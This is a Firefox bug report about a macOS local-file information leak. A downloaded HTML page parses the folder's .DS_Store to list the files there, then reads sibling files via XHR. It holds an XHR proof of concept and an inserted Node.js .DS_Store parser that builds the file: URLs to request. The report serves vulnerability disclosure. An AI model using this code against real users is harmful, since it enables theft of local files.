Closed
Bug 1455644
Opened 7 years ago
Closed 5 years ago
local file information leak on Mac using .DS_Store file
Categories
(Core :: DOM: File, defect)
RESOLVED
DUPLICATE
of bug 803143
People
(Reporter: llamakko, Unassigned)
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Steps to reproduce:
# Prior knowledge
When opening a local HTML file in Firefox, it's possible to obtain files under the same directory.
## e.g.
### Directory structure
```
.
|-- parent
|   |-- child
|   |   `-- child.txt
|   |-- current.txt
|   `-- test.html
`-- parent.txt
```
### test.html
```
<script>
// Request a sibling file, a file in the parent directory and a file in a
// subdirectory, each resolved relative to this local HTML file's file: URL.
let files = ['current.txt', '../parent.txt', 'child/child.txt'];
for (let file of files) {
  let url = new URL(file, location.href).href;
  let xhr = new XMLHttpRequest();
  xhr.addEventListener('load', () => {
    console.log('OK: ' + file);   // response delivered: the file could be read
  });
  xhr.addEventListener('error', () => {
    console.log('NG: ' + file);   // request blocked
  });
  xhr.open('GET', url);
  xhr.responseType = 'text';
  xhr.send();
}
</script>
```
### Result
OK: current.txt
NG: ../parent.txt
OK: child/child.txt
# Required
Firefox must be set as the default browser on the Mac.
# 1.
Please access the following page.
http://poc.vuln.jp/firefox/trunk/dsstore/
# 2.
A dialog will be displayed asking whether you want to open the file; just click "OK".
Actual results:
A list of files and directories in the download directory is displayed.
This is the result of parsing the .DS_Store file.
An attacker can use this list to acquire the contents of an arbitrary file via XHR and so forth.
Expected results:
I think that it would be better to reject cross-origin requests for the file: URI scheme.
In Google Chrome and Safari, this request is denied.
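The report does not reproduce the reporter's .DS_Store parser, so the following is an added example (not the reporter's PoC, not Mozilla code) of the directory-enumeration step it describes: a reader for the .DS_Store format, written for Node.js so it runs offline. The .DS_Store file is constructed inside the block by buildDsStore(), and the file names and the Downloads path in it are invented. In the browser the same parsing logic would run over an ArrayBuffer obtained with an XHR for `.DS_Store` next to the downloaded HTML file; the last function turns the recovered names into the same-directory file: URLs that the XHR step in the report would then request.

```javascript
// Added example, not the reporter's PoC: a Node.js reader for the .DS_Store format
// (Apple "Bud1" buddy-allocator file with a B-tree of per-file records). The sample
// bytes come from buildDsStore() below; file names and the Downloads path are invented.
const be32 = (v) => { const b = Buffer.alloc(4); b.writeUInt32BE(v, 0); return b; };
const utf16be = (s) => Buffer.from(s, 'utf16le').swap16();            // strings are UTF-16BE
const pow2 = (n) => { let s = 32; while (s < n) s *= 2; return s; };   // block sizes: powers of two, min 32

// One record: name length (UTF-16 units), name, 4-byte struct id, 4-byte type, value (blob here).
function record(name, id, payload) {
  const n = utf16be(name);
  return Buffer.concat([be32(n.length / 2), n, Buffer.from(id, 'latin1'),
    Buffer.from('blob', 'latin1'), be32(payload.length), payload]);
}

// Build a minimal but structurally valid .DS_Store: 36-byte header, root (allocator) block
// holding the block address table and the "DSDB" table of contents, the DSDB master block,
// and one leaf node with an 'Iloc' (icon position) record per entry. A block address packs
// the offset in its high bits and log2(size) in its low 5 bits; offsets are file position - 4.
function buildDsStore(names) {
  const sorted = [...names].sort();
  const leaf = Buffer.concat([be32(0), be32(sorted.length),           // child pointer 0 => leaf
    ...sorted.map((n) => record(n, 'Iloc', Buffer.alloc(16)))]);
  const master = Buffer.concat([2, 1, sorted.length, 1, 4096].map(be32)); // root node, levels, records, nodes, page size
  const sizes = [2048, pow2(master.length), pow2(leaf.length)];       // block 0 is the root block
  const addrs = [];
  let off = 0x20;                                                     // first offset after the header
  for (const b of [1, 2, 0]) {
    off = Math.ceil(off / sizes[b]) * sizes[b];                       // buddy blocks are aligned to their size
    addrs[b] = off | (31 - Math.clz32(sizes[b]));
    off += sizes[b];
  }
  const root = Buffer.alloc(2048);
  root.writeUInt32BE(3, 0);                                           // block count; an unknown u32 follows
  addrs.forEach((a, i) => root.writeUInt32BE(a, 8 + 4 * i));         // address table, zero padded to 256 entries
  let p = 8 + 1024;
  root.writeUInt32BE(1, p); p += 4;                                   // TOC with one entry: "DSDB" -> block 1
  root[p++] = 4; Buffer.from('DSDB', 'latin1').copy(root, p); p += 4;
  root.writeUInt32BE(1, p);                                           // 32 empty free lists follow (all zero)
  const pos = (b) => (addrs[b] - (addrs[b] & 0x1f)) + 4;
  const file = Buffer.alloc(off + 4);
  file.writeUInt32BE(1, 0); Buffer.from('Bud1', 'latin1').copy(file, 4);
  [pos(0) - 4, 2048, pos(0) - 4].forEach((v, i) => file.writeUInt32BE(v, 8 + 4 * i)); // root offset, size, offset
  [[0, root], [1, master], [2, leaf]].forEach(([b, data]) => data.copy(file, pos(b)));
  return file;
}

// Parse a .DS_Store buffer; returns every record as { name, id, type } in tree order.
function parseDsStore(buf) {
  const u32 = (o) => buf.readUInt32BE(o);
  if (buf.length < 36 || u32(0) !== 1 || buf.toString('latin1', 4, 8) !== 'Bud1') throw new Error('not a .DS_Store file');
  const rootPos = u32(8) + 4;
  const count = u32(rootPos);
  const addrs = Array.from({ length: count }, (_, i) => u32(rootPos + 8 + 4 * i));
  const toc = {};
  let q = rootPos + 8 + 4 * Math.ceil(count / 256) * 256;            // skip the padded address table
  for (let n = u32(q), i = 0, r = q + 4; i < n; i++) {
    const len = buf[r];
    toc[buf.toString('latin1', r + 1, r + 1 + len)] = u32(r + 1 + len);
    r += 5 + len;
  }
  if (!('DSDB' in toc)) throw new Error('no DSDB entry in table of contents');
  const blockPos = (b) => (addrs[b] - (addrs[b] & 0x1f)) + 4;
  const fixedLen = { bool: 1, long: 4, shor: 4, type: 4, comp: 8, dutc: 8 };
  const out = [];
  const readRecord = (at) => {
    const nlen = u32(at); at += 4;
    const name = Buffer.from(buf.subarray(at, at + 2 * nlen)).swap16().toString('utf16le'); at += 2 * nlen;
    const id = buf.toString('latin1', at, at + 4), type = buf.toString('latin1', at + 4, at + 8); at += 8;
    out.push({ name, id, type });
    if (type === 'blob') return at + 4 + u32(at);                      // length-prefixed bytes
    if (type === 'ustr') return at + 4 + 2 * u32(at);                  // length-prefixed UTF-16BE
    if (type in fixedLen) return at + fixedLen[type];
    throw new Error('unknown record type ' + type);
  };
  const walk = (node) => {
    let at = blockPos(node);
    const next = u32(at), n = u32(at + 4); at += 8;
    for (let i = 0; i < n; i++) {
      if (next) { walk(u32(at)); at += 4; }                            // internal node: child pointer before each record
      at = readRecord(at);
    }
    if (next) walk(next);                                              // rightmost child
  };
  walk(u32(blockPos(toc.DSDB)));                                       // master block begins with the root node number
  return out;
}

// Distinct names in the directory, and the same-directory file: URLs a local page could request.
const listEntries = (buf) => [...new Set(parseDsStore(buf).map((r) => r.name))];
const siblingUrls = (pageUrl, names) => names.map((n) => new URL(n, pageUrl).href);

// Constructed sample: what a Downloads folder's .DS_Store might list (invented names and path).
const SAMPLE = buildDsStore(['report.pdf', 'test.html', 'notes.txt']);
console.log(siblingUrls('file:///Users/victim/Downloads/test.html', listEntries(SAMPLE)));
```

Only names are recovered here; whether a given sibling is then readable depends on the browser's file: same-directory policy, which is the behaviour the report's XHR results table documents (sibling and subdirectory readable, parent denied). The builder keeps the real layout details (36-byte header, address table padded to 256 entries, one "DSDB" TOC entry, 32 free lists, size-aligned buddy blocks) so the parser is not tuned to a shortcut that a real Finder-written file would break.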
Updated•7 years ago
Flags: needinfo?(dveditz)
Updated•6 years ago
Group: firefox-core-security → core-security
Component: Untriaged → DOM: File
Product: Firefox → Core
Updated•6 years ago
Group: core-security → dom-core-security
Updated•6 years ago
Flags: needinfo?(dveditz)
Reporter
Comment 1•6 years ago
Hi,
I updated the PoC located at http://poc.vuln.jp/firefox/trunk/dsstore/ .
In the past, parsing of .DS_Store was done through an external server, but now it is possible to parse .DS_Store with JavaScript (locally only).
I think it will make the attack even easier.
I am sorry that my English is so bad.
If you have any questions or something you don't understand, just let me know anytime.
Comment 3•5 years ago
Right. Let me close it as dup.
Status: UNCONFIRMED → RESOLVED
Closed: 5 years ago
Flags: needinfo?(amarchesini)
Resolution: --- → DUPLICATE
Updated•5 years ago
Flags: sec-bounty-
Updated•2 years ago
Group: dom-core-security
Updated•8 months ago
Keywords: reporter-external